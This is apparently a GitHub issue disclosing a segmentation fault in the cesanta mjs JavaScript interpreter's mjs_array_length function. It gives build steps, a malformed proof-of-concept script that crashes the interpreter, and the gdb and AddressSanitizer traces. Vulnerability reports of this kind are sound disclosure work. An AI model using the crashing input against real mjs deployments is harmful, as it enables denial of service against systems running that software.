Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Segmentation fault on mjs_array_length #287

Open
CStriker opened this issue May 9, 2024 · 0 comments
Open

Segmentation fault on mjs_array_length #287

CStriker opened this issue May 9, 2024 · 0 comments

Comments

@CStriker
Copy link

CStriker commented May 9, 2024

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_array_length function in the mjs.c file.

Vulnerability Type
Segmentation fault

Environment

  • Operating System

Ubuntu 20.04

  • Steps to Reproduce
git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
gcc -DMJS_MAIN -fsanitize=address mjs.c -ldl -g -o mjs-asan
poc 
 let c = {
  a: 7111.111, a: 7111.1111,
foo: ffi-=	62.1-11,
  foo: 1.1111,
foo: ffi-=	66111, a: 7111.1111,
foo: ffi-=	62.1-11,
  foo: 1.1111,
foo: ffi-=	66.1511,
	foo: ffi-=	66.1511,
	 
foo: ffi-=												1,
	 
foo: ffi-=								111,
  foo: ffi-=	66.1511,
	 foo: ffi('iit)�««««««o: 1.«'),
};

run command

./mjs-asan -f poc

gdb info

Program received signal SIGSEGV, Segmentation fault.
0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
6929	unsigned long mjs_array_length(struct mjs *mjs, mjs_val_t v) {
--Type <RET> for more, q to quit, c to continue without paging--
#0  0x000055555557938f in mjs_array_length (mjs=0x1000000010, v=106790066848102) at mjs.c:6929
#1  0x0000555555585183 in mjs_exec_internal (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", 
    src=0x612000000040 " let c = {\n  a: 7111.111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66111, a: 7111.1111,\nfoo: ffi-=\t62.1-11,\n  foo: 1.1111,\nfoo: ffi-=\t66.1511,\n\tfoo: ffi-=\t66.1511,\n\t \nfoo: ffi-=\t\t\t\t"..., generate_jsc=0, res=0x7fffffffdab0) at mjs.c:9044
#2  0x0000555555585460 in mjs_exec_file (mjs=0x615000000080, path=0x7fffffffe0b7 "../bug_2", res=0x7fffffffdb80) at mjs.c:9067
#3  0x00005555555913e1 in main (argc=3, argv=0x7fffffffdcd8) at mjs.c:11406

address sanitizer info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==1337947==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555557938f bp 0x7fffffffda10 sp 0x7fffffffd708 T0)
==1337947==The signal is caused by a READ memory access.
==1337947==Hint: address points to the zero page.
    #0 0x55555557938e in mjs_array_length /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929
    #1 0x555555585182 in mjs_exec_internal /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9044
    #2 0x55555558545f in mjs_exec_file /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:9067
    #3 0x5555555913e0 in main /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:11406
    #4 0x7ffff73a1082 in __libc_start_main ../csu/libc-start.c:308
    #5 0x55555555c8ed in _start (/data1/hjkim/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs-asan+0x88ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/hjkim/work/afl_exp/directed_fuzzing/mjs_latest/mjs/mjs.c:6929 in mjs_array_length
==1337947==ABORTING
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@CStriker